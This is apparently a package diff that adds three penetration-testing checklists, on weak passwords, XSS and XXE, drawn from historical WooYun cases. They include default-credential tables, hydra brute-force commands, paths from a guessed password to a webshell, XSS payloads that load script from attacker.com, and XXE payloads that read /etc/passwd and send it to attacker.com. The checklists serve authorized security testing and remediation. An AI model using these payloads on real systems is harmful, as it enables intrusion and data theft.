@vigolium/piolium 0.0.1

package/skills/wooyun-legacy/references/checklists/weak-password-checklist.md

@@ -0,0 +1,115 @@
+# Weak Password Testing Checklist
+> Derived from ~75 real-world vulnerability cases (WooYun 2010-2016)
+
+## High-Risk Parameters to Test
+| Parameter | Context |
+|-----------|---------|
+| `id`, `uid` | User identifiers for enumeration |
+| `cmd` | Command execution post-auth |
+| `action` | Admin action parameters |
+| `dir` | Directory browsing post-auth |
+| `systemID` | System selector parameters |
+| `APP_UNIT` | Application unit identifiers |
+| `site_id` | Multi-tenant site selectors |
+
+## Most Common Default Credentials
+| Username | Password | Context |
+|----------|----------|---------|
+| `admin` | `admin` | Web application admin panels |
+| `admin` | `123456` | Chinese web applications |
+| `admin` | `admin123` | CMS backends |
+| `admin` | `000000` | Enterprise systems |
+| `admin` | `password` | Generic default |
+| `weblogic` | `weblogic` | Oracle WebLogic console |
+| `weblogic` | `12345678` | WebLogic (alternate) |
+| `root` | `root` | Database, SSH |
+| `test` | `test` | Development accounts |
+| `sa` | *(empty)* | MSSQL default |
+| `prtgadmin` | `prtgadmin` | PRTG monitoring |
+| `tomcat` | `tomcat` | Apache Tomcat manager |
+
+## Common Attack Patterns (by frequency)
+1. **Admin panel weak password** (most common)
+   - CMS/OA systems with default `admin/123456`
+   - No account lockout after failed attempts
+2. **Service weak password**
+   - WebLogic, JBoss, Tomcat management consoles
+   - Database services (MySQL, MSSQL, Oracle)
+   - Monitoring platforms (Zabbix, PRTG, Nagios)
+3. **Infrastructure weak password**
+   - SSH/Telnet with default credentials
+   - Router/switch admin interfaces
+   - IPMI/BMC management (e.g., Huawei Tecal)
+4. **Password → Shell escalation chain**
+   - WebLogic console → Deploy WAR → Webshell
+   - Tomcat manager → Deploy WAR → Code execution
+   - JBoss JMXInvokerServlet → Remote code execution
+   - Database access → OS command via xp_cmdshell/UDF
+
+## High-Value Weak Password Targets
+| Service | Default Port | Default Creds |
+|---------|-------------|---------------|
+| WebLogic | 7001 | weblogic/weblogic |
+| Tomcat Manager | 8080 | tomcat/tomcat |
+| JBoss | 8080 | admin/admin |
+| phpMyAdmin | 80/8080 | root/*(empty)* |
+| Jenkins | 8080 | *(no auth)* |
+| Zabbix | 10051 | Admin/zabbix |
+| Nagios | 80 | nagiosadmin/nagios |
+| Grafana | 3000 | admin/admin |
+| Router | 80 | admin/admin |
+| VPN | 443 | *(varies)* |
+
+## Quick Test Vectors
+```
+# Top password list for Chinese web applications
+admin
+123456
+admin123
+000000
+password
+12345678
+test
+888888
+666666
+abc123
+admin888
+qwerty
+
+# Username enumeration
+admin, administrator, root, test, guest
+manager, system, sysadmin, operator
+[company-name], [domain-prefix]
+
+# Service-specific brute force
+hydra -l admin -P passwords.txt TARGET http-post-form
+hydra -l root -P passwords.txt TARGET ssh
+hydra -l sa -P passwords.txt TARGET mssql
+```
+
+## Post-Authentication Escalation
+1. **WebLogic** → Deploy WAR package → Webshell
+2. **Tomcat** → Manager app → Deploy WAR → Shell
+3. **JBoss** → JMXInvokerServlet → Remote execution
+4. **phpMyAdmin** → SELECT INTO OUTFILE → Webshell
+5. **Database** → Read config files → Internal credentials
+6. **OA System** → Internal documents → VPN credentials
+7. **Email** → Password reset → Other system access
+
+## Testing Methodology
+1. Enumerate admin panel and service login pages
+2. Test default credentials for identified services
+3. Attempt common username/password combinations
+4. Check for account lockout policies
+5. Test rate limiting on login endpoints
+6. Verify password complexity requirements
+7. Check for credential reuse across services
+8. Test post-authentication escalation paths
+
+## Common Root Causes
+- Default credentials never changed after installation
+- No password complexity policy enforcement
+- No account lockout or rate limiting
+- Management consoles exposed to internet
+- Same password reused across multiple services
+- Development/test accounts left in production

package/skills/wooyun-legacy/references/checklists/xss-checklist.md

@@ -0,0 +1,103 @@
+# XSS Testing Checklist
+> Derived from 46 real-world vulnerability cases (WooYun 2010-2016)
+
+## High-Risk Parameters to Test
+| Parameter | Frequency | Notes |
+|-----------|-----------|-------|
+| `id` | 2x | Reflected in page content |
+| `photourl` | 1x | Image URL parameters; direct injection |
+| `w` / `kwd` | 1x | Search keyword parameters |
+| `url` / `sohuurl` | 1x | URL redirect/embed parameters |
+| `uid` / `status` | 1x | User profile fields |
+| `auth_str` | 1x | Authentication string reflected in page |
+| `m` | 1x | Module/method selectors |
+| `rf` | 1x | Referrer parameters |
+| `vers` | 1x | Version parameters in Flash embeds |
+| `word` / `get` | 1x | Search and query parameters |
+
+## XSS Type Distribution
+| Type | Observed Cases | Risk |
+|------|---------------|------|
+| Stored XSS | ~65% | Critical - persists, affects all viewers |
+| Reflected XSS | ~25% | High - requires victim click |
+| DOM-based XSS | ~10% | High - client-side only |
+
+## Common Attack Vectors (by frequency)
+
+### 1. Stored XSS via User Input Fields
+- **Forum posts / comments**: Most common stored XSS entry point
+- **Profile fields**: Username, bio, personal description
+- **Blog content**: Post titles and body content
+- **Mobile app submissions**: WAP pages with weaker filtering than PC
+- **Forwarded content**: Social sharing features re-rendering HTML
+
+### 2. Reflected XSS via URL Parameters
+- Search boxes and keyword parameters
+- Error pages reflecting user input
+- Redirect URL parameters
+- Image/resource URL parameters
+
+### 3. Flash-Based XSS
+- SWF files with `allowscriptaccess="always"`
+- Flash embed tags loading external SWF files
+- ExternalInterface.call() in ActionScript
+
+## Payload Catalog
+
+### Basic Detection
+```
+"><script>alert(1)</script>
+<script>alert(document.cookie)</script>
+<img src=x onerror=alert(1)>
+```
+
+### Filter Bypass Payloads
+```
+<img src=# onerror=alert(/wooyun/)>
+<select autofocus onfocus=alert(1)>
+<textarea autofocus onfocus=alert(1)>
+" onfocus="alert(1)" autofocus="
+" onmouseout=javascript:alert(document.cookie)>
+<iframe src=javascript:alert(1)>
+```
+
+### Encoded Payloads
+```
+<img/src=1 onerror=(function(){window.s=document.
+  createElement(String.fromCharCode(115,99,114,105,
+  112,116));window.s.src=String.fromCharCode(104,116,
+  116,112,...);document.body.appendChild(window.s)})()>
+```
+
+### External Script Loading
+```
+<script src=//attacker.com/xss.js></script>
+"><script src=//short.example/xxxxx></script>
+```
+
+## Bypass Techniques
+- **Tag alternatives**: Use `<img>`, `<select>`, `<textarea>`, `<svg>` when `<script>` is filtered
+- **Event handlers**: `onfocus`, `onerror`, `onmouseout`, `onload` as alternatives to inline script
+- **Autofocus trick**: `<input autofocus onfocus=alert(1)>` triggers without user interaction
+- **HTML5 features**: New tags and event handlers bypass legacy filters
+- **Flash embed**: `allowscriptaccess=always` enables JS execution from SWF
+- **Case variation and encoding**: Mix case, use HTML entities, URL encoding
+- **DOM context escape**: Close existing tags with `">` before injecting
+
+## Quick Test Vectors
+```
+1. "><script>alert(1)</script>           (basic reflected)
+2. <img src=x onerror=alert(1)>          (tag alternative)
+3. " autofocus onfocus="alert(1)         (attribute injection)
+4. <svg/onload=alert(1)>                 (SVG context)
+5. javascript:alert(1)                   (URL context)
+6. </script><script>alert(1)</script>    (script context escape)
+```
+
+## High-Value Targets
+- **Comment/review systems**: Stored XSS reaching admin panels
+- **User profile pages**: Username/bio fields rendered on public pages
+- **Search results pages**: Reflected XSS via keyword parameters
+- **Mobile/WAP versions**: Often weaker filtering than desktop
+- **Social sharing features**: Content re-rendered across contexts
+- **Admin panels via blind XSS**: Input fields reviewed by admins

package/skills/wooyun-legacy/references/checklists/xxe-checklist.md

@@ -0,0 +1,130 @@
+# XXE (XML External Entity) Testing Checklist
+> Derived from 25 real-world vulnerability cases (WooYun 2010-2016)
+
+## Entry Points to Test
+| Entry Point | Frequency | Notes |
+|-------------|-----------|-------|
+| SOAP/WSDL web services | ~35% | Axis2, XFire, CXF endpoints |
+| Document upload (DOCX/XLSX) | ~20% | Office XML parsed server-side |
+| XML API endpoints | ~20% | REST/SOAP accepting XML input |
+| WeChat/messaging API callbacks | ~10% | Third-party integration XML parsing |
+| File preview functionality | ~10% | Server-side document rendering |
+| XML-RPC endpoints | ~5% | Legacy RPC interfaces |
+
+## Vulnerability Types Observed
+| Type | Count | Description |
+|------|-------|-------------|
+| Blind XXE (OOB) | ~40% | No direct response; exfiltrate via external DTD |
+| Direct file read | ~35% | File contents returned in response |
+| SSRF via XXE | ~15% | Internal port scanning, service access |
+| DoS via entity expansion | ~10% | Billion laughs / recursive entities |
+
+## Common Attack Payloads
+
+### 1. Basic File Read (Direct XXE)
+```xml
+<?xml version="1.0" encoding="UTF-8"?>
+<!DOCTYPE foo [
+  <!ENTITY xxe SYSTEM "file:///etc/passwd">
+]>
+<root>&xxe;</root>
+```
+
+### 2. Blind XXE with External DTD (OOB)
+**Malicious DTD hosted on attacker server:**
+```xml
+<!ENTITY % file SYSTEM "file:///etc/passwd">
+<!ENTITY % eval "<!ENTITY &#x25; send SYSTEM
+  'http://attacker.com/?data=%file;'>">
+%eval;
+%send;
+```
+
+**Injection payload:**
+```xml
+<?xml version="1.0" encoding="UTF-8"?>
+<!DOCTYPE root [
+  <!ENTITY % remote SYSTEM "http://attacker.com/evil.dtd">
+  %remote;
+]>
+```
+
+### 3. Directory Listing via Gopher/File Protocol
+```xml
+<!ENTITY % a SYSTEM "file:///">
+<!ENTITY % b "<!ENTITY &#37; c SYSTEM
+  'gopher://attacker.com:80/%a;'>">
+%b;
+%c;
+```
+
+### 4. SSRF via XXE (Port Scanning)
+```xml
+<!DOCTYPE foo [
+  <!ENTITY xxe SYSTEM "http://127.0.0.1:22/">
+]>
+<root>&xxe;</root>
+```
+Response time indicates port state: slow = open, fast = closed.
+
+### 5. DOCX-Based XXE
+Decompress .docx, inject entity in `word/document.xml`:
+```xml
+<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
+<!DOCTYPE ANY [
+  <!ENTITY xxe SYSTEM "file:///etc/passwd">
+]>
+<!-- Reference &xxe; within document body -->
+```
+
+## Common Vulnerable Endpoints
+```
+/services/ServiceName?wsdl          (Axis2/CXF SOAP)
+/webservice/services/xxx            (Java web services)
+/live800/services/IVerification     (Customer service platforms)
+/opes/preview.do                    (Document preview)
+/?wsdl                              (WSDL discovery)
+/xmlrpc.php                         (XML-RPC)
+```
+
+## Bypass Techniques
+- **Protocol alternatives**: When `file://` is blocked, try `gopher://`, `php://`, `data://`
+- **Parameter entities**: Use `%entity;` instead of `&entity;` for blind XXE
+- **Encoding tricks**: UTF-7, UTF-16 encoding to bypass XML filters
+- **DOCX/XLSX containers**: Embed XXE in Office XML documents
+- **Content-Type override**: Set `Content-Type: application/xml` on SOAP endpoints
+
+## Quick Test Vectors
+```
+1. Add DOCTYPE with external entity to any XML input
+2. Upload crafted DOCX with XXE in word/document.xml
+3. Test WSDL endpoints with XML entity injection
+4. Use Blind XXE with OOB DTD when no direct response
+5. Test SSRF via entity pointing to internal services
+6. Check for simplexml_load_string() in PHP (WeChat APIs)
+```
+
+## Affected Technologies
+| Technology | Cases | Notes |
+|------------|-------|-------|
+| Java (Axis2, XFire, CXF) | ~50% | SOAP services most vulnerable |
+| PHP (simplexml_load_string) | ~20% | WeChat SDK, CMS platforms |
+| Java (document processing) | ~15% | DOCX/XLSX preview features |
+| .NET (XML parsers) | ~10% | Default parser configurations |
+| XML-RPC libraries | ~5% | Legacy RPC implementations |
+
+## Root Causes
+| Cause | Frequency |
+|-------|-----------|
+| Default XML parser allows external entities | Most common |
+| No DTD processing restrictions | Very common |
+| WeChat SDK sample code using unsafe parser | Common |
+| Document preview parsing XML without restrictions | Common |
+| Exposed WSDL/SOAP endpoints | Common |
+
+## Remediation Verification
+When verifying fixes, confirm:
+- External entity processing is disabled in XML parser
+- DTD processing is disabled or restricted
+- `LIBXML_NOENT` flag is NOT used (PHP)
+- `DocumentBuilderFactory.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true)` (Java)